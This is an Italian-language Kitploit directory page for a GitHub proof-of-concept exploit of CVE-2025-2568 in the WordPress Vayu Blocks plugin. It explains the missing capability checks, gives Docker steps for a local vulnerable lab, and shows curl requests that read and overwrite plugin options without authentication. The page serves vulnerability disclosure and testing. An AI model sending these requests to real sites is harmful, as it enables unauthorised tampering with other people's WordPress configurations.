Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC_CVE-2025-2568 — Proof-of-concept exploit per CVE-2025-2568, che dimostra l'accesso e la modifica non autorizzati delle opzioni del plugin WordPress Vayu Blocks tramite controlli di capacità mancanti. | Kitploit
Strumenti/GitHubGitHub/shinigami-777/poc_cve-2025-2568
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

Proof-of-concept exploit per CVE-2025-2568, che dimostra l'accesso e la modifica non autorizzati delle opzioni del plugin WordPress Vayu Blocks tramite controlli di capacità mancanti.

Vedi Repository
81 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC CVE-2025-2568

Panoramica

Il plugin Vayu Blocks – Gutenberg Blocks per WordPress e WooCommerce è vulnerabile ad accesso non autorizzato e modifica dei dati a causa della mancanza di controlli sulle capacità nelle funzioni vayu_blocks_get_toggle_switch_values_callback e vayu_blocks_save_toggle_switch_callback nelle versioni 1.0.4 fino a 1.2.1. Ciò consente ad attaccanti non autenticati di leggere le opzioni del plugin e aggiornare qualsiasi opzione con un nome di chiave che termina con _value.

Passaggi di sfruttamento

Configurazione (usando docker)

  1. Clona il repository e segui i passaggi:
    cd vuln-wordpress
    docker-compose up -d
    
  2. Decomprimi il plugin Vayu nella cartella wp-content/plugins.
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    Il plugin Vayu-blocks (versione 1.2.0) è ora installato.

Exploit:

  1. Usa questo comando per leggere le opzioni:
    curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
    
  2. Invia una richiesta POST come questa per modificare i valori delle opzioni.
    curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
     -H "Content-Type: application/json" \
     -d '{"key":"container", "value":"new_value"}'
    

Video dell'exploit

wordpressexploit.webm

Scarica lo strumento